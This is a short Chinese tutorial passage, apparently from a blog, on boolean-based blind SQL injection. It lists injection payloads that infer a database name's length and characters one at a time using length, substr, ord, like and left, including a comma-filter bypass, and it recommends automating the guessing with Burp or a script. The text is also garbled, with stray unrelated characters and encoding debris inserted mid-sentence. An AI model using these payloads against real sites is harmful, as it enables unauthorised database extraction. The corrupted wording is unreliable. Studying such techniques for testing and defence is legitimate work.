當頁面存在注入點驾诈,但只顯示查詢到的信息是否為空衣陶,可以使用布爾注入
長度判斷:
?栗子: 1' and length(database())>=1
?當and后面的條件不滿足時财饥,數(shù)據(jù)庫不會查詢到任何結果,因為條件恒為假
判讀第一個字符:
?1' and substr(database(),1,1)='a'
?1' and substr(database() from 1 for 1)='a' --(繞過逗號)
?1' and ord(substr(database(),1,1))=115
?1' and database() like 'c%';
?1' and left(database(),1)='a'
當判斷正確的時候务嫡,頁面提示查詢到甲抖,就表明第一個字符猜對了,那么就繼續(xù)猜測第二個字符
當然我們不會自己手動去測試(試完手會斷)
一般會使用burp爆破或者寫一個腳本跑
